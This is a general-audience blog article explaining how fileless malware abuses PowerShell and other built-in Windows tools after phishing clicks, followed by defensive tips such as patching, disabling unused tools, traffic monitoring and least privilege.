Most phishing and malware scams follow a fairly predictable pattern:
- Unsuspecting users click on suspicious links.
- In doing so, they unwittingly download a piece of malicious code.
- Once installed, that code takes over the users’ computers.
- The code’s creator then has unlimited access to the computers’ data.
This type of malware is a very real threat, but because the malicious code is stored locally, most antivirus solutions and native security apps can detect the intrusion. In fact, phishing attacks tend to be most successful when targeting computers that either lack antivirus protection or use outdated operating systems.
Now, there is an emerging malware threat that has security experts extremely concerned. Known as “fileless attacks,” this type of phishing scam doesn’t install software on a user’s hard drive. Instead, it works by hijacking native programs that already exist — essentially turning the computer against itself.
How Do Fileless Attacks Work?
Also known as “zero-footprint” or “non-malware” attacks, this newer type of phishing method is much harder to detect — precisely because files aren’t downloaded or installed locally.
In most cases, the process works as follows:
- An unsuspecting user clicks on a suspicious link.
- The user is redirected to a website that uses Flash or some other browser-based interface.
- Flash opens the computer’s Windows PowerShell tool and begins executing new instructions in the command code. All of this is done in the computer’s memory (i.e., RAM), not on the physical hard drive.
- The code’s creator can then intercept any information sent or received through that computer. He or she can execute admin-level functions as well.
Fileless Malware Examples (That Don’t Use Flash)
You might be thinking, “No problem. Our organization doesn’t ever use Flash.”
But not so fast. There are many fileless malware examples in which criminals successfully exploited vulnerabilities in browsers, various Microsoft products and countless other tools.
No matter what entry point is used, the underlying threat remains the same since fileless attacks hijack legitimate software programs that have already been installed on the user’s machine.
Because the malicious code exists only in the RAM, there aren’t any suspicious or foreign files that raise alarms with antivirus software. Fileless attacks are also able to circumvent whitelisting — i.e., the process by which administrators must “approve” which apps are allowed to be installed.
To make matters worse, a fileless attack on one machine can potentially infect all other networked computers. So, even if you’re diligent about not clicking on suspicious links, you’re not necessarily safe. If a family member or colleague gets hit by a fileless attack, your machine is also at risk.
Fileless Malware Protection: The Good and the Bad
One of the reasons why security experts are so concerned is that fileless attacks are incredibly effective:
- In the absence of locally stored files, detecting new fileless malware examples is very difficult.
- Once a single networked computer is infected, the damage can quickly spread laterally to other machines.
According to the Ponemon Institute, fileless attacks are 10 times more likely to succeed than are their file-based counterparts. In 2017 alone, 77 percent of all documented attacks were classified as “fileless.”
Even though this new cyber threat is on the rise, fileless malware protection has yet to crystallize around a foolproof body of best practices.
However, there are some common-sense strategies you can implement to make yourself less of a target.
1. Don’t Click on Suspicious Links
This fileless malware protection tip is both deceptively easy and difficult at the same time, because “suspicious” links are becoming increasingly less suspicious. Criminals know how to dress their emails, websites and text messages to look like legitimate pieces of communication.
Case in point: If someone sent you this article with the subject line “Common Fileless Malware Examples and How to Stop Them” — you’d probably click on it, right?
Now imagine that a hacker sent you the same message and subject line — but instead of bringing you here, the embedded link took you to a dodgy website.
2. Keep Your Machines Up-To-Date
Always use the latest version of whatever operating system is available. Install all patches and updates.
3. Disable Non-Essential Tools
If you’re on a Windows machine, you should disable PowerShell, Windows Management Instrumentation, and macros — unless these tools are vital to your organization’s operations. All three are legitimate programs provided by Microsoft, but they’re also the most vulnerable when it comes to fileless attacks.
If you don’t know what these tools are, you’re probably not using them.
4. Monitor Your Network’s Traffic
This step has less to do with fileless malware protection and more to do with detection, but you should monitor your network’s activity to see if there are sudden spikes in traffic for which your team can’t account. Those momentary blips could indicate that someone has unauthorized access to one of your organization’s machines.
5. Implement the ‘Principle of Least Privilege’
You should restrict every employee’s access rights on a need-to-know basis. Lower-level staffers, for example, don’t need administrative privileges if they’re only working on data entry.
6. Consider Third-Party Solutions
Although antivirus programs aren’t very good at detecting (or preventing) fileless attacks, there are a growing number of third-party providers that “claim” to provide protection.
A Final Fileless Malware Protection Tip
Fileless attacks are hard to detect, prevent and contain. This is especially true if you lack the IT and security know-how to:
- Monitor network traffic
- Assign admin roles
- Disable critical functions
There is one final step you can take to protect yourself, and it’s a bit drastic.
Although no single operating system is 100 percent immune from fileless attacks, most of the fileless malware examples above seem to focus on Windows. If all else fails, you may be better off switching your organization’s computers to Apple, Chrome OS or Linux.